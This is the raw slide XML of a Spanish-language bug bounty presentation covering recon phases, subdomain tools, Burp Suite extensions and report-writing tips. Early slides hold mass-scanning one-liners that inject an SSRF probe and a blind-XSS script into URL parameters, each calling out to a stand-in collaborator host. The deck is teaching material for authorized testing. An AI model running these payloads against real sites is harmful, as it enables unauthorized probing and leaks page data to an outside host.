              <a:t>silent</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" dirty="0"/>
              <a:t> -</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" dirty="0" err="1"/>
              <a:t>threads</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" dirty="0"/>
              <a:t> 1000 | </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" dirty="0" err="1"/>
              <a:t>gau</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" dirty="0"/>
              <a:t> |  grep "=" | </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" dirty="0" err="1"/>
              <a:t>qsreplace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http://YOUR.burpcollaborator.net</a:t>
            </a:r>
            <a:endParaRPr lang="es-ES" dirty="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="es-ES" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="es-ES" dirty="0"/>
              <a:t>Fallo XSS:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="es-ES" dirty="0" err="1"/>
              <a:t>cat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" dirty="0"/>
              <a:t> recon.txt| </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" dirty="0" err="1"/>
              <a:t>httpx</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" dirty="0"/>
              <a:t> -</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" dirty="0" err="1"/>
              <a:t>silent</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" dirty="0"/>
              <a:t> -</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" dirty="0" err="1"/>
              <a:t>threads</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" dirty="0"/>
              <a:t> 1000 | </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" dirty="0" err="1"/>
              <a:t>gau</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" dirty="0"/>
              <a:t> |  grep "=" | </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" dirty="0" err="1"/>
              <a:t>qsreplace</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" dirty="0"/>
              <a:t> “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&lt;script&gt;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i=new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Image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i.src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"/>
              </a:rPr>
              <a:t>http://YOUR.burpcollaborator.net/?document.location;&lt;/script&gt;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s-ES" altLang="es-ES" dirty="0" err="1"/>
              <a:t>Spidering</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" altLang="es-ES" dirty="0"/>
              <a:t> en </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" altLang="es-ES" dirty="0" err="1"/>
              <a:t>Burp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" altLang="es-ES" dirty="0"/>
              <a:t> -&gt; Pestaña target </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" altLang="es-ES" dirty="0" err="1"/>
              <a:t>copy</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" altLang="es-ES" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" altLang="es-ES" dirty="0" err="1"/>
              <a:t>selected</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" altLang="es-ES" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" altLang="es-ES" dirty="0" err="1"/>
              <a:t>items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s-ES" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="es-ES" dirty="0"/>
              <a:t>En vez de </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" dirty="0" err="1"/>
              <a:t>gau</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" dirty="0"/>
              <a:t> se puede usar </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" dirty="0">
                <a:hlinkClick r:id="rId4"/>
              </a:rPr>
              <a:t>https://github.com/devanshbatham/ParamSpider</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" dirty="0"/>
              <a:t> por ejemplo</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="es-ES" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="es-ES" dirty="0"/>
              <a:t>Parámetros -&gt; </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" dirty="0" err="1"/>
              <a:t>Parameth</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" dirty="0"/>
              <a:t> y </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" dirty="0" err="1"/>
              <a:t>Arjun</a:t>
            </a:r>
            <a:endParaRPr lang="es-ES" dirty="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="es-ES" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="es-ES" dirty="0"/>
              <a:t>Ejemplo url-headers.py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A31B17D-BC0A-4551-9241-39FFE90AB833}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3300898" y="492451"/>
            <a:ext cx="4702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14924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B4794B-1E42-4839-A9DB-13ED6C790E89}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2492792" y="668019"/>
            <a:ext cx="67270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Escáneres automáticos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A7CED9-0DFD-440A-9B44-364A0C5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8" y="1890944"/>
            <a:ext cx="5934294" cy="3387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DBA402-B094-4455-B6B8-35FEA1D9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51" y="2267422"/>
            <a:ext cx="5494721" cy="218111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BD2F1BA-DCDA-41AA-A0B0-55F713877D21}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7368467" y="4773260"/>
            <a:ext cx="4225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</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" dirty="0" err="1"/>
              <a:t>Jaeles</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" dirty="0"/>
              <a:t> tiene integración con </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" dirty="0" err="1"/>
              <a:t>BurpSuite</a:t>
            </a:r>
            <a:endParaRPr lang="es-ES" dirty="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="es-ES" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="es-ES" dirty="0"/>
              <a:t>Existen </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" dirty="0" err="1"/>
              <a:t>dork</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" dirty="0" err="1"/>
              <a:t>scanners</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" dirty="0"/>
              <a:t> por ahí que también funcionan muy bien. Aunque suelen funcionar de 1 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" dirty="0" err="1"/>
              <a:t>dork</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" dirty="0"/>
              <a:t> en 1 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" dirty="0" err="1"/>
              <a:t>dork</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" dirty="0"/>
              <a:t> se puede escribir un script para hacer pruebas masivas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255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987425-D03B-41CE-91AF-FC1333E1B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9619"/>
            <a:ext cx="7773903" cy="3435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92F5D6-2019-460C-8BD8-DB116325570C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3898938" y="446077"/>
            <a:ext cx="3169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err="1">
                <a:ln/>
                <a:solidFill>
                  <a:schemeClr val="accent3"/>
                </a:solidFill>
                <a:effectLst/>
              </a:rPr>
              <a:t>Burp</a:t>
            </a:r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 Suite</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="6" name="final_601440e9b566e7003d338a90_404649">
            <a:hlinkClick r:id="" action="ppaction://media"/>
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{66EE32FE-F2BF-447E-8F6B-681EC5AC6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7658" y="1935702"/>
            <a:ext cx="3683493" cy="36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80FBD72-C039-44B9-8DA1-CA6C73DE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612" y="1979720"/>
            <a:ext cx="3737314" cy="28310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8F3F0DD-6C59-4E49-AE92-8FE6E1A1CCB7}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="772356" y="1859339"/>
            <a:ext cx="70666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-Certificaciones: OSCP, OSWP, CRTP, CREST CPSA, CREST CRT</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="es-ES" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="es-ES" dirty="0"/>
              <a:t>     -Unos cuantos </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" dirty="0" err="1"/>
              <a:t>CVEs</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" dirty="0"/>
              <a:t> y algunos </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" dirty="0" err="1"/>
              <a:t>bounties</a:t>
            </a:r>
            <a:endParaRPr lang="es-ES" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="es-ES" dirty="0"/>
              <a:t>  </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="es-ES" dirty="0"/>
              <a:t>     -https://www.linkedin.com/in/daniel-monzón-peso-7a64a6175/</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="es-ES" dirty="0"/>
              <a:t>   </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="es-ES" dirty="0"/>
              <a:t>     -Twitter: @stark0de1</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="es-ES" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="es-ES" dirty="0"/>
              <a:t>     -Blog: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" dirty="0">
                <a:hlinkClick r:id="rId3"/>
              </a:rPr>
              <a:t>https://stark0de.com</a:t>
            </a:r>
            <a:endParaRPr lang="es-ES" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="es-ES" dirty="0"/>
              <a:t>     </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="es-ES" dirty="0"/>
              <a:t>     -Red </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" dirty="0" err="1"/>
              <a:t>Team</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" dirty="0"/>
              <a:t> en Atalanta </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" dirty="0" err="1"/>
              <a:t>Evolution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B8A8224-83FF-463E-AB16-3018BF67618F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="408649" y="2960923"/>
            <a:ext cx="363707" cy="936151"/>
            <a:chOff x="537795" y="3579499"/>
            <a:chExt cx="363707" cy="93615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2A4D1A7-0796-4776-8B45-07547E52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13" y="3579499"/>
              <a:ext cx="345389" cy="34627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181FC47-A1BA-449C-BEEF-89A9FD567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95" y="4156801"/>
              <a:ext cx="358849" cy="358849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B2835CED-A423-4A53-B23D-26AD61F1491B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4446065" y="543731"/>
            <a:ext cx="25186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err="1">
                <a:ln/>
                <a:solidFill>
                  <a:schemeClr val="accent3"/>
                </a:solidFill>
                <a:effectLst/>
              </a:rPr>
              <a:t>whoami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144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392F5D6-2019-460C-8BD8-DB116325570C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3898938" y="446077"/>
            <a:ext cx="3169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err="1">
                <a:ln/>
                <a:solidFill>
                  <a:schemeClr val="accent3"/>
                </a:solidFill>
                <a:effectLst/>
              </a:rPr>
              <a:t>Burp</a:t>
            </a:r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 Suite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D8DCA8-BDD3-486D-A6D7-A6513DDC6EDE}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1837678" y="1784412"/>
            <a:ext cx="8566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-Active </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" dirty="0" err="1"/>
              <a:t>Scan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" dirty="0"/>
              <a:t>++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Authorize</a:t>
            </a:r>
            <a:endParaRPr lang="es-ES" dirty="0"/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Copy</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" dirty="0"/>
              <a:t> as Python </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" dirty="0" err="1"/>
              <a:t>Requests</a:t>
            </a:r>
            <a:endParaRPr lang="es-ES" dirty="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="es-ES" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="es-ES" dirty="0"/>
              <a:t>-HUNT</a:t>
            </a:r>
          </a:p>
          <a:p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Reflected</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" dirty="0" err="1"/>
              <a:t>Parameters</a:t>
            </a:r>
            <a:endParaRPr lang="es-ES" dirty="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="es-ES" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="es-ES" dirty="0"/>
              <a:t>-Handy </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" dirty="0" err="1"/>
              <a:t>collaborator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4CBB9B-1A92-4F9F-81BC-DCAA0C8B2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31" y="1784412"/>
            <a:ext cx="3810000" cy="2562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1D742-4546-4DF4-9FD3-6D05DDB8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25" y="4346637"/>
            <a:ext cx="3321822" cy="19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3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A32F67-975B-48FF-BC97-B614E748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33" y="1397226"/>
            <a:ext cx="7328332" cy="406354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1E46DA-9A8A-4030-8BD6-19D9BCCE38D0}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3392749" y="6001305"/>
            <a:ext cx="540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https://pentester.land/tips-n-tricks/2018/08/16/cloud-vps-providers-for-bug-hunters.html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979D61-BC80-4046-9D9B-8BB06E393DE5}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5247245" y="210364"/>
            <a:ext cx="1289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VPS</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="145145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7F023C-37C9-4E3C-A458-D6923D21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5" y="1221789"/>
            <a:ext cx="7510509" cy="42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8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B798772-78A8-464B-816B-55D4D24D4EA5}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3776003" y="295157"/>
            <a:ext cx="4089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3"/>
                </a:solidFill>
              </a:rPr>
              <a:t>BUG BOUNTY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E99A8A-8900-46D2-B7B2-C53EA805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6" y="1759184"/>
            <a:ext cx="3977196" cy="898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0A6EEB-7302-4A80-A2DC-844D661F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4" y="1402672"/>
            <a:ext cx="3690680" cy="17918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416A44-874F-480B-B9B2-E44EF3B5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2771727"/>
            <a:ext cx="2857500" cy="2857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B64C353-ECD6-4A81-8A61-2A572A8E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52" y="3272529"/>
            <a:ext cx="4227317" cy="18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6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84A4A3F-B42B-4301-B8EB-4B62EAF73EF2}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3740492" y="357300"/>
            <a:ext cx="4089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BUG BOUNTY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2762A-5F02-4736-B8FF-CBF4817B5B7F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1728188" y="1582340"/>
            <a:ext cx="81141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</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" dirty="0" err="1"/>
              <a:t>Scope</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" dirty="0"/>
              <a:t> amplio, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" dirty="0" err="1"/>
              <a:t>bounties</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" dirty="0"/>
              <a:t> considerables. Leerse detalladamente el </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" dirty="0" err="1"/>
              <a:t>scope</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" dirty="0"/>
              <a:t> del programa y sus reglas (y sobre todo los tipos de fallos que admite)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="es-ES" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="es-ES" dirty="0"/>
              <a:t>-No ofuscarse al reportar, lo importante es demostrar el impacto al </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" dirty="0" err="1"/>
              <a:t>triager</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" dirty="0"/>
              <a:t>.  Revisar cada cierto tiempo cómo va el reporte (si lo han arreglado, si pudieron replicar el fallo,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/>
              <a:t>-No meterse en demasiados programas a la vez, aquí cuenta más la calidad que la cantidad</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="es-ES" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="es-ES" dirty="0"/>
              <a:t>-No rendirse a la primera y al empezar, hacerlo con pocas expectativas</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="es-ES" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="es-ES" dirty="0"/>
              <a:t>-Haz lo que hace todo el mundo y tendrás un bonito </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" dirty="0" err="1"/>
              <a:t>Duplicate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-Intenta automatizar cuantos más procesos mejor (Python/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" dirty="0" err="1">
                <a:sym typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              </a:rPr>
              <a:t>Bash</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" dirty="0">
                <a:sym typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              </a:rPr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896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7B22125-CD97-43B4-B2FE-C6F8C783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75" y="719423"/>
            <a:ext cx="6170720" cy="32293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4DB8117-AAA6-4BE7-8013-DD145EAB8EAE}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1510683" y="630315"/>
            <a:ext cx="91706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Report</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>- Brief summary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Vulnerability details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Business impact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PoC</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> (screenshots), python files,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Mitigation &amp; references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959DDF-A951-4E27-B028-36AB068C9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79" y="870010"/>
            <a:ext cx="4709111" cy="35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3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E7639C-2223-41E5-B7A0-690F0917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" y="1367160"/>
            <a:ext cx="5340130" cy="4461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0925B0-0243-4CF8-B7B8-1D90A8B15646}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1082536" y="845145"/>
            <a:ext cx="486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https://docs.hackerone.com/changelog/2019/july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2A9B34A-7A00-4527-A52B-3AE71E8686A0}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6590446" y="720829"/>
            <a:ext cx="456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https://docs.hackerone.com/programs/pentests.html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4A7022-378A-4EC5-A8F1-F6A97EC2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74" y="1519843"/>
            <a:ext cx="4481397" cy="48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D44BA2F-1453-43F1-8DDA-30AC87E70A00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5624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6CC050C-EAEB-458A-892F-FE8E47423710}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3743198" y="434299"/>
            <a:ext cx="4249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SUBDOMAINS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BF0E4A-D0F4-4D95-B96A-1D722CEF1191}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1322773" y="1666783"/>
            <a:ext cx="543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FASES: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90C8917F-42A9-4850-98E1-E1CC86E0C92A}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1322773" y="2654423"/>
            <a:ext cx="3009530" cy="15802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69CF9EED-7B47-45B9-804D-F17EF00D73FA}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3595456" y="2654423"/>
            <a:ext cx="3009530" cy="1580226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B15B5144-868F-4F10-9324-C7324FF64A46}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5868139" y="2654423"/>
            <a:ext cx="3009530" cy="158022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CDC470-95A8-49E3-81CC-3961F9ECC2B8}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1696713" y="2982897"/>
            <a:ext cx="217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Tools activas y</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="es-ES" dirty="0"/>
              <a:t>Tools pasivas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52C5F6-A100-41A2-AE64-3C2B8DC8D728}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4431035" y="3120930"/>
            <a:ext cx="171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¿Están activos?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7C26489-EC0A-46FD-A770-3298B06605D7}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6808633" y="2828835"/>
            <a:ext cx="1543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Identificación visual de cosas interesantes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086E35AD-523A-4BB5-9E85-88F2F3A86E5D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8158579" y="2654423"/>
            <a:ext cx="3009530" cy="1580226"/>
          </a:xfrm>
          <a:prstGeom prst="chevron">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="F13B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B33B6F9-9EC1-4A97-B8AD-5AE1FF347675}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5868139" y="4447713"/>
            <a:ext cx="362907" cy="405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9D7002A4-CCE3-4D69-8D9F-F83187AFB0E0}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6338656" y="4927107"/>
            <a:ext cx="2663301" cy="94103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FD0777-4B79-42CA-801E-894ED9CFE7D1}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7009142" y="5074457"/>
            <a:ext cx="210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Escáneres automáticos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B3B0DE7-BD68-4CEB-AAF2-B56591D21883}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="9134042" y="3011699"/>
            <a:ext cx="177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manuales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5FBE4A8-6EC0-486F-832E-CB6024F4000E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="701336" y="4650335"/>
            <a:ext cx="4580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Repetir el proceso con los subdominios, hay subdominios de segundo orden</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="127866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E72DC7-6E89-490B-BC37-2889E0A6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98" y="1678040"/>
            <a:ext cx="7476366" cy="424780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296C4DE-2536-4150-A4A6-D7DCF399F2F5}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1793698" y="446076"/>
            <a:ext cx="7696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TOOLS</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" sz="5400" b="1" dirty="0">
                <a:ln/>
                <a:solidFill>
                  <a:schemeClr val="accent3"/>
                </a:solidFill>
              </a:rPr>
              <a:t> ACTIVAS Y PASIVAS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20AD9C7-A330-46A9-8C02-00EF8293C103}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="9490230" y="1813290"/>
            <a:ext cx="2485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Tip: apuntar cabeceras y cookies propias de una empresa, pueden llevarnos a más subdominios</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="26694940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953</Words>
  <Application>Microsoft Office PowerPoint</Application>
  <PresentationFormat>Panorámica</PresentationFormat>
  <Paragraphs>152</Paragraphs>
  <Slides>22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Monzon Peso</dc:creator>
  <cp:lastModifiedBy>Daniel Monzon Peso</cp:lastModifiedBy>
  <cp:revision>54</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2021-01-23T09:45:03Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2021-01-30T11:29:18Z</dcterms:modified>
</cp:coreProperties>
</file>